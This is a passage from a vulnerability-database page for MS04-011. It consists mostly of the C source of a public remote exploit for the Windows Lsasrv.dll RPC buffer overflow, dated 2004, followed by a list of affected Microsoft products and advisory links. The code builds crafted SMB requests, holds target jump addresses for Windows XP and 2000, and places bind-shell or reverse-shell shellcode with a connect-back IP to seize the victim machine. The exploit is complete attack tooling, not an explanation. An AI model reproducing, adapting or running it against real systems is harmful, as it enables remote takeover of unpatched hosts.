"\x00\x00\x00\x00\x7C\x70\x40\x00\x01\x00\x00\x00\x00\x00\x00\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x78\x85\x13\x00\xAB\x5B\xA6\xE9";
char req8[] =
"\x00\x00\x10\xF8\xFF\x53\x4D\x42\x2F\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xFF\xFE"
"\x00\x08\x60\x00\x0E\xFF\x00\xDE\xDE\x00\x40\x00\x00\x00\x00\xFF"
"\xFF\xFF\xFF\x08\x00\xB8\x10\x00\x00\xB8\x10\x40\x00\x00\x00\x00"
"\x00\xB9\x10\xEE\x05\x00\x00\x01\x10\x00\x00\x00\xB8\x10\x00\x00"
"\x01\x00\x00\x00\x0C\x20\x00\x00\x00\x00\x09\x00\xAD\x0D\x00\x00"
"\x00\x00\x00\x00\xAD\x0D\x00\x00";
// room for shellcode here ...
char req9[] =
"\x00\x00\x0F\xD8\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x18\x01"
"\x00\x08\x70\x00\x10\x00\x00\x84\x0F\x00\x00\x00\x04\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x84\x0F\x54\x00\x02"
"\x00\x26\x00\x00\x40\x95\x0F\x00\x5C\x00\x50\x00\x49\x00\x50\x00"
"\x45\x00\x5C\x00\x00\x00\x00\x00\x05\x00\x00\x02\x10\x00\x00\x00"
"\x84\x0F\x00\x00\x01\x00\x00\x00\x6C\x0F\x00\x00\x00\x00\x09\x00";
char shit3[] =
"\x00\x00\x00\x00\x9A\xA8\x40\x00\x01\x00\x00\x00\x00\x00\x00\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
"\x01\x00\x00\x00"
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
"\x00\x00\x00\x00\x9A\xA8\x40\x00\x01\x00\x00\x00\x00\x00\x00\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x9A\xA8\x40\x00\x01\x00\x00\x00"
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x9A\xA8\x40\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00";
#define LEN 3500
#define BUFSIZE 2000
#define NOP 0x90
struct targets {
int num;
char name[50];
long jmpaddr;
} ttarget[]= {
{ 0, "WinXP Professional [universal] lsass.exe ", 0x01004600 }, // jmp esp addr
{ 1, "Win2k Professional [universal] netrap.dll", 0x7515123c }, // jmp ebx addr
{ 2, "Win2k Advanced Server [SP4] netrap.dll", 0x751c123c }, // jmp ebx addr
//{ 3, "reboot", 0xffffffff }, // crash
{ NULL }
};
void usage(char *prog)
{
int i;
printf("Usage:\n\n");
printf("%s <target> <victim IP> <bindport> [connectback IP] [options]\n\n", prog);
printf("Targets:\n");
for (i=0; i<3; i++)
printf(" %d [0x%.8x]: %s\n", ttarget[i].num, ttarget[i].jmpaddr, ttarget[i].name);
printf("\nOptions:\n");
printf(" -t: Detect remote OS:\n");
printf(" Windows 5.1 - WinXP\n");
printf(" Windows 5.0 - Win2k\n\n");
exit(0);
}
int main(int argc, char *argv[])
{
int i;
int opt = 0;
char *target;
char hostipc[40];
char hostipc2[40*2];
unsigned short port;
unsigned long ip;
unsigned char *sc;
char buf[LEN+1];
char sendbuf[(LEN+1)*2];
char req4u[sizeof(req4)+20];
char screq[BUFSIZE+sizeof(req7)+1500+440];
char screq2k[4348+4060];
char screq2k2[4348+4060];
char recvbuf[1600];
char strasm[]="\x66\x81\xEC\x1C\x07\xFF\xE4";
char strBuffer[BUFSIZE];
unsigned int targetnum = 0;
int len, sockfd;
short dport = 445;
struct hostent *he;
struct sockaddr_in their_addr;
char smblen;
char unclen;
WSADATA wsa;
printf("\nMS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1\n");
printf("--- Coded by .::[ houseofdabus ]::. ---\n\n");
if (argc < 4) {
usage(argv[0]);
}
target = argv[2];
sprintf((char *)hostipc,"\\\\%s\\ipc$", target);
for (i=0; i<40; i++) {
hostipc2[i*2] = hostipc[i];
hostipc2[i*2+1] = 0;
}
memcpy(req4u, req4, sizeof(req4)-1);
memcpy(req4u+48, &hostipc2[0], strlen(hostipc)*2);
memcpy(req4u+47+strlen(hostipc)*2, req4+87, 9);
smblen = 52+(char)strlen(hostipc)*2;
memcpy(req4u+3, &smblen, 1);
unclen = 9 + (char)strlen(hostipc)*2;
memcpy(req4u+45, &unclen, 1);
if (argc > 4)
if (!memcmp(argv[4], "-t", 2)) opt = 1;
if ( (argc > 4) && !opt ) {
port = htons(atoi(argv[3]))^(USHORT)0x9999;
ip = inet_addr(argv[4])^(ULONG)0x99999999;
memcpy(&reverseshell[118], &port, 2);
memcpy(&reverseshell[111], &ip, 4);
sc = reverseshell;
} else {
port = htons(atoi(argv[3]))^(USHORT)0x9999;
memcpy(&bindshell[176], &port, 2);
sc = bindshell;
}
if ( (atoi(argv[1]) == 1) || (atoi(argv[1]) == 2)) {
memset(buf, NOP, LEN);
//memcpy(&buf[2020], "\x3c\x12\x15\x75", 4);
memcpy(&buf[2020], &ttarget[atoi(argv[1])].jmpaddr, 4);
memcpy(&buf[2036], sc, strlen(sc));
memcpy(&buf[2840], "\xeb\x06\xeb\x06", 4);
memcpy(&buf[2844], &ttarget[atoi(argv[1])].jmpaddr, 4); // jmp ebx addr
//memcpy(&buf[2844], "\x3c\x12\x15\x75", 4); // jmp ebx addr
memcpy(&buf[2856], sc, strlen(sc));
for (i=0; i<LEN; i++) {
sendbuf[i*2] = buf[i];
sendbuf[i*2+1] = 0;
}
sendbuf[LEN*2]=0;
sendbuf[LEN*2+1]=0;
memset(screq2k, 0x31, (BUFSIZE+sizeof(req7)+1500)*2);
memset(screq2k2, 0x31, (BUFSIZE+sizeof(req7)+1500)*2);
} else {
memset(strBuffer, NOP, BUFSIZE);
memcpy(strBuffer+160, sc, strlen(sc));
memcpy(strBuffer+1980, strasm, strlen(strasm));
*(long *)&strBuffer[1964]=ttarget[atoi(argv[1])].jmpaddr;
}
memset(screq, 0x31, BUFSIZE+sizeof(req7)+1500);
WSAStartup(MAKEWORD(2,0),&wsa);
if ((he=gethostbyname(argv[2])) == NULL) { // get the host info
perror("[-] gethostbyname ");
exit(1);
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("socket");
exit(1);
}
their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(dport);
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(their_addr.sin_zero), '\0', 8);
printf("[*] Target: IP: %s: OS: %s\n", argv[2], ttarget[atoi(argv[1])].name);
printf("[*] Connecting to %s:445 ... ", argv[2]);
if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
{
printf("\n[-] Sorry, cannot connect to %s:445. Try again...\n", argv[2]);
exit(1);
}
printf("OK\n");
if (send(sockfd, req1, sizeof(req1)-1, 0) == -1) {
printf("[-] Send failed\n");
exit(1);
}
len = recv(sockfd, recvbuf, 1600, 0);
if (send(sockfd, req2, sizeof(req2)-1, 0) == -1) {
printf("[-] Send failed\n");
exit(1);
}
len = recv(sockfd, recvbuf, 1600, 0);
if (send(sockfd, req3, sizeof(req3)-1, 0) == -1) {
printf("[-] Send failed\n");
exit(1);
}
len = recv(sockfd, recvbuf, 1600, 0);
if ((argc > 5) || opt) {
printf("[*] Detecting remote OS: ");
for (i=0; i<12; i++) {
printf("%c", recvbuf[48+i*2]);
}
printf("\n");
exit(0);
}
printf("[*] Attacking ... ");
if (send(sockfd, req4u, smblen+4, 0) == -1) {
printf("[-] Send failed\n");
exit(1);
}
len = recv(sockfd, recvbuf, 1600, 0);
if (send(sockfd, req5, sizeof(req5)-1, 0) == -1) {
printf("[-] Send failed\n");
exit(1);
}
len = recv(sockfd, recvbuf, 1600, 0);
if (send(sockfd, req6, sizeof(req6)-1, 0) == -1) {
printf("[-] Send failed\n");
exit(1);
}
len = recv(sockfd, recvbuf, 1600, 0);
if ( (atoi(argv[1]) == 1) || (atoi(argv[1]) == 2)) {
memcpy(screq2k, req8, sizeof(req8)-1);
memcpy(screq2k+sizeof(req8)-1, sendbuf, (LEN+1)*2);
memcpy(screq2k2, req9, sizeof(req9)-1);
memcpy(screq2k2+sizeof(req9)-1, sendbuf+4348-sizeof(req8)+1, (LEN+1)*2-4348);
memcpy(screq2k2+sizeof(req9)-1+(LEN+1)*2-4348-sizeof(req8)+1+206, shit3, sizeof(shit3)-
1);
if (send(sockfd, screq2k, 4348, 0) == -1) {
printf("[-] Send failed\n");
exit(1);
}
len = recv(sockfd, recvbuf, 1600, 0);
if (send(sockfd, screq2k2, 4060, 0) == -1) {
printf("[-] Send failed\n");
exit(1);
}
} else {
memcpy(screq, req7, sizeof(req7)-1);
memcpy(screq+sizeof(req7)-1, &strBuffer[0], BUFSIZE);
memcpy(screq+sizeof(req7)-1+BUFSIZE, shit1, 9*16);
screq[BUFSIZE+sizeof(req7)-1+1500-304-1] = 0;
if (send(sockfd, screq, BUFSIZE+sizeof(req7)-1+1500-304, 0)== -1){
printf("[-] Send failed\n");
exit(1);
}
}
printf("OK\n");
len = recv(sockfd, recvbuf, 1600, 0);
return 0;
}
// milw0rm.com [2004-04-29]
Products Mentioned
Configuraton 0
Microsoft>>Netmeeting >> Version *
- Microsoft>>Netmeeting >> Version - (Open CPE detail)
- Microsoft>>Netmeeting >> Version 2.1 (Open CPE detail)
- Microsoft>>Netmeeting >> Version 3 (Open CPE detail)
- Microsoft>>Netmeeting >> Version 3.0.1 (Open CPE detail)
- Microsoft>>Netmeeting >> Version 3.0.1_4.4.3385 (Open CPE detail)
- Microsoft>>Netmeeting >> Version 3.01 (Open CPE detail)
Configuraton 0
Microsoft>>Windows_2000 >> Version *
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
Microsoft>>Windows_2000 >> Version *
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
Microsoft>>Windows_2003_server >> Version r2
Microsoft>>Windows_98 >> Version *
- Microsoft>>Windows_98 >> Version - (Open CPE detail)
Microsoft>>Windows_me >> Version *
- Microsoft>>Windows_me >> Version - (Open CPE detail)
- Microsoft>>Windows_me >> Version - (Open CPE detail)
- Microsoft>>Windows_me >> Version - (Open CPE detail)
Microsoft>>Windows_nt >> Version 4.0
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
Microsoft>>Windows_xp >> Version *
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
References
http://lists.grok.org.uk/pipermail/full-disclosure/2004-April/020069.html
Tags : mailing-list, x_refsource_FULLDISC
Tags : mailing-list, x_refsource_FULLDISC
http://www.ciac.org/ciac/bulletins/o-114.shtml
Tags : third-party-advisory, government-resource, x_refsource_CIAC
Tags : third-party-advisory, government-resource, x_refsource_CIAC
http://www.eeye.com/html/Research/Advisories/AD20040413C.html
Tags : third-party-advisory, x_refsource_EEYE
Tags : third-party-advisory, x_refsource_EEYE
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A919
Tags : vdb-entry, signature, x_refsource_OVAL
Tags : vdb-entry, signature, x_refsource_OVAL
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2004/ms04-011
Tags : vendor-advisory, x_refsource_MS
Tags : vendor-advisory, x_refsource_MS
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A898
Tags : vdb-entry, signature, x_refsource_OVAL
Tags : vdb-entry, signature, x_refsource_OVAL
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A883
Tags : vdb-entry, signature, x_refsource_OVAL
Tags : vdb-entry, signature, x_refsource_OVAL
